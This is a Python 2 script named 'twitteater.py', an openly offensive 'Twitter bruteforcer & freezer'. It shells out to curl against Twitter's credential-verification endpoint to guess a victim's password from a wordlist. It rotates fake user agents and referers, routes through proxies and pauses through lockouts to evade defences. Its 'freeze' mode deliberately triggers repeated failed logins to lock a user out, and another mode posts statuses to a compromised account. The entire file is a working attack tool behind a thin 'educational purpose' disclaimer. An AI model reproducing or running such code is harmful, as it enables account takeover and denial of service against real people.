CODE:
#!/usr/bin/python
# Toolname : twitteater.py
# Programmer : gunslinger_
# my forum : www.devilzc0de.org/forum
# Version : v1.0
# This was written for educational purpose only.
# Use this at your own risk.
# Author will be not responsible for any damage !
# I'm preffer using curl on system than using pycurl
import sys, time, StringIO, commands, re, os, random
# Define variable
__programmer__ = "gunslinger_ "
__version__ = "1.0"
twittbird = '''
+++ ++++ ++++ +++
+++++ ++++ ++++ +++++
+++++ ++ ++++ +++++
++++++++++++++ ++ ++ ++ ++++ +++++ ++++ ++++++
++++++++++++++ ++++ ++++ ++++ ++++ +++++++++++ +++++++++++ +++++++++++ ++++++++++
+++++ ++++ ++++ ++++ ++++ +++++++++++ +++++++++++ +++++ +++++ ++++++++++
+++++ ++++ ++++ ++++ ++++ ++++++++++ +++++++++ +++++++++++++ +++++
+++++ ++++ ++++++ ++++ ++++ +++++ +++++ +++++++++++++ ++++
++++++++++++ ++++++ +++++++ +++++ ++++ +++++++++ +++++++++ ++++ ++++
++++++++++++ +++++++++++++++++++ ++++ +++++++++ ++++++++ +++++++++++ ++++
++++++++++ +++++++ ++++++ ++++ ++++++++ +++++++ ++++++++ ++++
"The bird has been eaten by python snake..."
Programmer : %s
Version : %s
Twitter bruteforcer & freezer
''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-s, --singlepass | Use single password (for update status only)
-d, --updatestatus | Post new status at given username
-v, --verbose | Set %s will be verbose
-p, --proxy | Set proxy will be use
-t, --timeout | Set %s timeout request time (default : 15)
-r, --refferer | Set %s refferer will be use (default : random)
-f, --freeze | freeze user, user will be unable login for any minute
-l, --log | Specify output filename (default : twitteater.log)
-h, --help | Print this help
Example :
- bruteforcing mode ~> %s -u brad@hackme.com -w wordlist.txt
- freeze mode ~> %s -u brad@hackme.com -f
- update status mode ~> %s -u brad@hackme.com -s hackmeifyoucan -d "Beware of Programmers who carry screwdrivers. -- Leonard Brandwein"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help''' % sys.argv[0]
refferer = ['http://twitter.com/',
'http://twitter.com/login',
'http://twitter.com/about/contact',
'http://blog.twitter.com/',
'http://status.twitter.com/',
'http://twitter.com/about',
'http://twitter.com/about'
]
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
freeze = False
upstat = False
brute = False
counter = 1
# warn , twitter will lock username after 17 x login attempt (tested)
maxlock = 18
verbocity = ''
proxy = ''
background = ''
timeout = '15'
statsurl = 'http://twitter.com/statuses/update.xml'
credential = 'http://twitter.com/account/verify_credentials.xml'
green = '\033[38m'
red = '\033[31m'
reset = '\033[0;0m'
log = "twitteater.log"
file = open(log, "a")
def helpme():
print twittbird
print option
file.write(twittbird)
file.write(option)
sys.exit(1)
def helpmee():
print twittbird
print hme
file.write(twittbird)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
brute = True
elif arg.lower() == '-f' or arg.lower() == '--freeze':
freeze = True
elif arg.lower() == '-d' or arg.lower() == '--updatestatus':
newstatus = sys.argv[int(sys.argv[1:].index(arg))+2]
newstatus = newstatus.replace("_"," ")
upstat = True
elif arg.lower() == '-t' or arg.lower() == '--timeout':
timeout = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-s' or arg.lower() == '--singlepass':
password = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-r' or arg.lower() == '--refferer':
refferer = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
proxy = '-x '+sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbocity = "-v"
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
def updatestatus():
trytwitter = 'curl -u %s:%s %s -d status=\"%s\" %s --connect-timeout %d -A \"%s\" %s' % (username, password, statsurl, newstatus, verbocity, int(timeout), random.choice(ouruseragent), proxy)
restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
updated = re.findall("", restwitter)
duplicate = re.findall("Status is a duplicate.", restwitter)
if verbocity == "-v":
print restwitter
if duplicate:
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Duplicate status found\"")
print "[*] Duplicate status is not accepted by twitter, please don't reduplicate it\n"
file.write("\n[*] Duplicate status is not accepted by twitter, please don't reduplicate it!\n\n")
sys.exit(1)
if updated:
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status successfully\"")
print "[*] Update status : %s%s%s has been posted successfully ! \n" % (red, newstatus, reset)
file.write("\n[*] Update status : %s has been posted successfully !\n\n" % (newstatus))
sys.exit(1)
else:
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status failed\"")
print "[*] password is wrong ! \n"
file.write("\n[*] password is wrong !\n\n")
sys.exit(1)
def freezemode():
global counter
if freeze:
print "[*] Trying to freeze account %s%s%s, user will be unable login for hour(s)" % (red, username, reset)
file.write("\n[*] Trying to freeze account %s, user will be unable login for hour(s)" % (username))
try:
while counter <= maxlock:
sys.stdout.write("\r[*] %s%d%s try has gived... " % (red, int(counter), reset))
sys.stdout.flush()
trytwitter = 'curl -u %s:freeze %s %s --connect-timeout %d' % (username, credential, verbocity, int(timeout))
restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
locked = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
if locked:
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account successfully freeze\"")
print "\n[*] Acount freeze %s%s%s succeded, and unable for login for %d seconds !" % (red, username, reset, int(locked[0]))
file.write("\n[*] Acount freeze %s succeded, and unable for login for %d seconds !\n\n" % (username, int(locked[0])))
sys.exit(1)
if verbocity == "-v":
print restwitter
counter = int(counter) + 1
except KeyboardInterrupt:
print "\n[-] Deactivated freezing mode\n"
file.write("\n[-] Deactivated freezing mode\n")
sys.exit(1)
def twitteater(word):
global counter
sys.stdout.write("\r[*] Trying %s is %s%d%s of %s%d%s " % (word, red, int(counter), reset, red, len(words), reset))
sys.stdout.flush()
file.write("\n[*] Trying %s is %d of %d \n" % (word, int(counter), len(words)))
try:
trytwitter = 'curl -u %s:%s %s -A "%s" %s -e %s --connect-timeout %d %s' % (username, word, credential, random.choice(ouruseragent), verbocity, random.choice(refferer), int(timeout), proxy)
restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
partwitter = re.findall("", restwitter)
sick = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
if sick:
print "\n[*] Account %s%s%s has been freeze by twitter" % (red, username, reset)
file.write("\n[*] Account %s has been freeze by twitter" % (username))
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account has been freeze\"")
sleeper = 0
while sleeper <= int(sick[0]):
sys.stdout.write("\r[*] Waiting %d second(s) for start bruteforcing again... " % (int(sick[0])))
sys.stdout.flush()
sleeper = int(sleeper) + 1
sick[0] = int(sick[0]) - 1
time.sleep(1)
if partwitter:
print "\n[*] Account has been login successfully !"
print "[*] Username : %s%s%s" % (red, username, reset)
print "[*] Password : %s%s%s" % (red, word, reset)
file.write("\n[*] Account has been login successfully !\n")
file.write("[*] Username : %s\n" % (username))
file.write("[*] Password : %s\n\n" % (word))
os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"login successfull !\"")
sys.exit(1)
if verbocity == "-v":
print restwitter
except KeyboardInterrupt:
print "\n[-] Deactivated bruteforcing mode...\n"
file.write("\n[-] Deactivated bruteforcing mode...\n")
sys.exit(1)
counter = int(counter) + 1
def bruteforcemode():
global word
for word in words:
twitteater(word.replace("\n",""))
def main():
global words
print twittbird
file.write(twittbird)
print "[*] Starting attack at %s" % time.strftime("%X")
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
if freeze:
print "[*] %sFreeze%s mode %sactivated%s" % (red, reset, red, reset)
file.write("\n[*] Freeze mode activated")
elif brute:
print "[*] %sBruteforce%s mode %sactivated%s" % (red, reset, red, reset)
file.write("\n[*] bruteforce mode activated")
elif upstat:
print "[*] %sUpdate status%s mode %sactivated%s" % (red, reset, red, reset)
file.write("\n[*] Update status mode activated")
print "[*] Using PID : %s%s%s \n" % (red, os.getpid(), reset)
file.write("\n[*] Using PID : %s \n" % (os.getpid()))
if freeze:
freezemode()
if upstat:
updatestatus()
if brute:
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
bruteforcemode()
twitteater(word)
if __name__ == '__main__':
main()
